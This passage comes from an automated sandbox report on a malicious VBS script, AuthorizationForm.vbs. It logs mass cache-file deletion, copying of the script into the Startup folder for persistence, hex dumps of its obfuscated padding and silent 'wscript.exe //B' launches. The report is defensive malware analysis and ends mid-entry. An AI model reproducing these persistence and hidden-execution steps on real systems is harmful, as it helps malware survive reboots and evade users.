C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApB31p[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApsh0Q[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApwg57[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApxnEn[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\ast[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\ast[2].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\btn-app-store.97e640f20e success or wait 1 6F309346 DeleteFileW 96[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\css[1].txt success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\down-arrow-blue.6c077dd5 success or wait 1 6F309346 DeleteFileW 7553[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\experiment_firefox_new_f success or wait 1 6F309346 DeleteFileW c_search_retention.90e6fb3ca1fc[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\firefox_new_onboarding_c success or wait 1 6F309346 DeleteFileW ommon-bundle.136a56bfe2b9[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\firefox_new_pixel-bundle success or wait 1 6F309346 DeleteFileW .ffe2124229c7[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\gtm[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\header-logo-inverse.510f success or wait 1 6F309346 DeleteFileW 97e92635[1].png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\html5shiv.d580a4cd1cb4[1 success or wait 1 6F309346 DeleteFileW ].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\jquery-1.11.1.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\MemMDL2.2.17[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\optimizely-snippet-bundl success or wait 1 6F309346 DeleteFileW e.7119ca69b1d6[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\tabzilla-static.953a65a1 success or wait 1 6F309346 DeleteFileW f4a4[1].png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\th[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\trans[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\WebCore.4.19.0.ltr.light success or wait 1 6F309346 DeleteFileW .min[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\container.dat success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\cookies[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\core[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\dest5[1].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\FRE-adobe-FPO[1].png success or wait 1 6F309346 DeleteFileW
Copyright Joe Security LLC 2018 Page 23 of 30 Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\FRE-FW[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\jquery-ui[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\jquery.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\latest[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\latest[2].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\p[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\reset[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\17k[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\246059135[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\AA54rQj[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\AAdAVrM[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\AApB1P2[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\adsWrapperMSNI[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\advertisement.ad[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\analytics[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\ast[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\BB1kvzy[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\BBDk44m[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\BBnYSFZ[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\bs-jsdep[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\btn-google-play.d100575a success or wait 1 6F309346 DeleteFileW fc96[1].png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\core[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\firefox_new_scene2-bundl success or wait 1 6F309346 DeleteFileW e.2864989fccc1[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\geo2[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\icon-alert.90f18723c41a[ success or wait 1 6F309346 DeleteFileW 1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\icon-sprite.6e9f0f71a7fe success or wait 1 6F309346 DeleteFileW [1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[2].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[3].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[4].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\stub-attribution-bundle. success or wait 1 6F309346 DeleteFileW 6f2d0cdf7104[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\trans[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\1715500327[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\4300ae64-546c-4bbe-9026- success or wait 1 6F309346 DeleteFileW 6779b3684fb8_32[1].png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\accordion_icon_sprite[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\bxslider[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\core[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\FRE-background-v2[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\FRE-check-green[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\gl_site[1].svg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\jquery-1.9.1.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\modal[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\selectBox[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\string[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTI success or wait 1 6F309346 DeleteFileW NEP1R\take_make_rocks_1000X463[1].jpg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\FRE-IE[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\FRE-repair-FPO[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\FRE-Windows[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\getadobecom[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\jquery-1.7.1.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\jquery-1.8.3.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\jquery-ui.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\outside[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\polarbear[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\script[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\style[1].css success or wait 1 6F309346 DeleteFileW
Copyright Joe Security LLC 2018 Page 24 of 30 Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\yoe7ink[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\background[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\FRE-AV[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\latest[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\logo[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\ms[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\pdc_s_code[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\principallogomicrosoft[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\p[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\satelliteLib-7123a14bc11 success or wait 1 6F309346 DeleteFileW ffd1ad43be190a593a8932494dcb0[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\swfobject[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\yoe7ink-d[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\17k[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\AA3e1pt[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\AApAF80[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\b2fd15[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\bs-util[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\btn-google-play.77bdbc93 success or wait 1 6F309346 DeleteFileW 5c58[1].png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\DevCMDL2.2.18[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\e151e5[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\firefox_new_onboarding_s success or wait 1 6F309346 DeleteFileW cene1-bundle.9ac26ce2017d[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\firefox_new_onboarding_s success or wait 1 6F309346 DeleteFileW cene2-bundle.5329da405b3b[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\horizon-night.53e7d3475f success or wait 1 6F309346 DeleteFileW d0[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\mailbox.0b8d509e594e[1]. success or wait 1 6F309346 DeleteFileW png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\new[1].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\new[2].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\oldIE-bundle.889624ae22e success or wait 1 6F309346 DeleteFileW 6[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\Passport[1].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\print[1].txt success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=104272687;kvismo b=2;extmirroring=0;kvtile=1;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=104272687;kvismo b=2;extmirroring=0;kvtile=3;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=104272687;kvismo b=2;extmirroring=0;kvtile=4;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=104272687;kvismo b=2;extmirroring=0;kvtile=5;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\social-icon-sprite.bf2ae success or wait 1 6F309346 DeleteFileW 0cd0f01[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\stub_attribution_code[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\th[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\MSIMGSIZ.DAT success or wait 1 6F309346 DeleteFileW
File Written
Source File Path Offset Length Value Ascii Completion Count Address Symbol
Copyright Joe Security LLC 2018 Page 25 of 30 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Roaming\AuthorizationForm.vbs 0 65536 27 27 6d 52 7a 6a 4d ''mRzjMuvQIYGIUzwZilED success or wait 5 6F309434 CopyFileW 75 76 51 49 59 47 49 gejfTvAD 55 7a 77 5a 69 6c 45 zvMmxjOkwmKGDxvlRhT 44 67 65 6a 66 54 76 QhliSTugyfS 41 44 7a 76 4d 6d 78 TFuUeyUvvSGgHHQxMT 6a 4f 6b 77 6d 4b 47 TKIQGTyjhxIE 44 78 76 6c 52 68 54 EwvOORQOSKTLIgHZFQ 51 68 6c 69 53 54 75 AEvxKhUhLGuG 67 79 66 53 54 46 75 luSR..'mRzjMuvQIYGIUzw 55 65 79 55 76 76 53 ZilEDgej 47 67 48 48 51 78 4d fTvADzvMmxjOkwmKGDx 54 54 4b 49 51 47 54 vlRhTQhliST 79 6a 68 78 49 45 45 ugyfSTFuUeyUvvSGgHH 77 76 4f 4f 52 51 4f 53 QxMTTKIQGTy 4b 54 4c 49 67 48 5a jhxIEEwvOORQOSKTLIgH 46 51 41 45 76 78 4b ZFQAEvxKhU 68 55 68 4c 47 75 47 hLGuGluSR..'mRz 6c 75 53 52 0d 0a 27 6d 52 7a 6a 4d 75 76 51 49 59 47 49 55 7a 77 5a 69 6c 45 44 67 65 6a 66 54 76 41 44 7a 76 4d 6d 78 6a 4f 6b 77 6d 4b 47 44 78 76 6c 52 68 54 51 68 6c 69 53 54 75 67 79 66 53 54 46 75 55 65 79 55 76 76 53 47 67 48 48 51 78 4d 54 54 4b 49 51 47 54 79 6a 68 78 49 45 45 77 76 4f 4f 52 51 4f 53 4b 54 4c 49 67 48 5a 46 51 41 45 76 78 4b 68 55 68 4c 47 75 47 6c 75 53 52 0d 0a 27 6d 52 7a C:\Users\user\AppData\Roaming\ 0 26 5b 5a 6f 6e 65 54 72 [ZoneTransfer]....ZoneId=0 success or wait 1 6F309434 CopyFileW AuthorizationForm.vbs:Zone.Identifier 61 6e 73 66 65 72 5d 0d 0a 0d 0a 5a 6f 6e 65 49 64 3d 30 C:\Users\user\AppData\Roaming\Microsoft\Windows\Start 0 65536 27 27 6d 52 7a 6a 4d ''mRzjMuvQIYGIUzwZilED success or wait 5 6F309434 CopyFileW Menu\Programs\Startup\AuthorizationForm.vbs 75 76 51 49 59 47 49 gejfTvAD 55 7a 77 5a 69 6c 45 zvMmxjOkwmKGDxvlRhT 44 67 65 6a 66 54 76 QhliSTugyfS 41 44 7a 76 4d 6d 78 TFuUeyUvvSGgHHQxMT 6a 4f 6b 77 6d 4b 47 TKIQGTyjhxIE 44 78 76 6c 52 68 54 EwvOORQOSKTLIgHZFQ 51 68 6c 69 53 54 75 AEvxKhUhLGuG 67 79 66 53 54 46 75 luSR..'mRzjMuvQIYGIUzw 55 65 79 55 76 76 53 ZilEDgej 47 67 48 48 51 78 4d fTvADzvMmxjOkwmKGDx 54 54 4b 49 51 47 54 vlRhTQhliST 79 6a 68 78 49 45 45 ugyfSTFuUeyUvvSGgHH 77 76 4f 4f 52 51 4f 53 QxMTTKIQGTy 4b 54 4c 49 67 48 5a jhxIEEwvOORQOSKTLIgH 46 51 41 45 76 78 4b ZFQAEvxKhU 68 55 68 4c 47 75 47 hLGuGluSR..'mRz 6c 75 53 52 0d 0a 27 6d 52 7a 6a 4d 75 76 51 49 59 47 49 55 7a 77 5a 69 6c 45 44 67 65 6a 66 54 76 41 44 7a 76 4d 6d 78 6a 4f 6b 77 6d 4b 47 44 78 76 6c 52 68 54 51 68 6c 69 53 54 75 67 79 66 53 54 46 75 55 65 79 55 76 76 53 47 67 48 48 51 78 4d 54 54 4b 49 51 47 54 79 6a 68 78 49 45 45 77 76 4f 4f 52 51 4f 53 4b 54 4c 49 67 48 5a 46 51 41 45 76 78 4b 68 55 68 4c 47 75 47 6c 75 53 52 0d 0a 27 6d 52 7a C:\Users\user\AppData\Roaming\Microsoft\Windows\Start 0 26 5b 5a 6f 6e 65 54 72 [ZoneTransfer]....ZoneId=0 success or wait 1 6F309434 CopyFileW Menu\Programs\Startup\AuthorizationForm.vbs:Zone.Identifier 61 6e 73 66 65 72 5d 0d 0a 0d 0a 5a 6f 6e 65 49 64 3d 30
Registry Activities
Copyright Joe Security LLC 2018 Page 26 of 30 Source Key Path Completion Count Address Symbol
Source Key Path Name Type Data Completion Count Address Symbol
Source Key Path Name Type Old Data New Data Completion Count Address Symbol
Analysis Process: explorer.exe PID: 3188 Parent PID: 2812
General
Start time: 20:26:18 Start date: 17/01/2018 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs' Imagebase: 0x774a0000 File size: 2972672 bytes MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935 Programmed in: C, C++ or other language Reputation: high
File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Caches read data or list normal directory file and object name collision 1 12D76F ILCreateFromPathW directory and synchronous io synchronize non alert and open for backup ident and open reparse point
Analysis Process: explorer.exe PID: 3200 Parent PID: 2812
General
Start time: 20:26:18 Start date: 17/01/2018 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs' Imagebase: 0x74190000 File size: 2972672 bytes MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935 Programmed in: C, C++ or other language Reputation: high
File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Caches read data or list normal directory file and object name collision 1 12D76F ILCreateFromPathW directory and synchronous io synchronize non alert and open for backup ident and open reparse point
Copyright Joe Security LLC 2018 Page 27 of 30 Analysis Process: explorer.exe PID: 3224 Parent PID: 548
General
Start time: 20:26:18 Start date: 17/01/2018 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding Imagebase: 0x75b60000 File size: 2972672 bytes MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935 Programmed in: C, C++ or other language Reputation: high
File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Source File Path Offset Length Value Ascii Completion Count Address Symbol
Registry Activities
Source Key Path Completion Count Address Symbol
Source Key Path Name Type Data Completion Count Address Symbol
Source Key Path Name Type Old Data New Data Completion Count Address Symbol
Analysis Process: explorer.exe PID: 3236 Parent PID: 2812
General
Start time: 20:26:18 Start date: 17/01/2018 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A uthorizationForm.vbs Imagebase: 0x75310000 File size: 2972672 bytes MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935 Programmed in: C, C++ or other language Reputation: high
File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Caches read data or list normal directory file and object name collision 1 12D728 ILCreateFromPathW directory and synchronous io synchronize non alert and open for backup ident and open reparse point
Copyright Joe Security LLC 2018 Page 28 of 30 Analysis Process: explorer.exe PID: 3300 Parent PID: 548
General
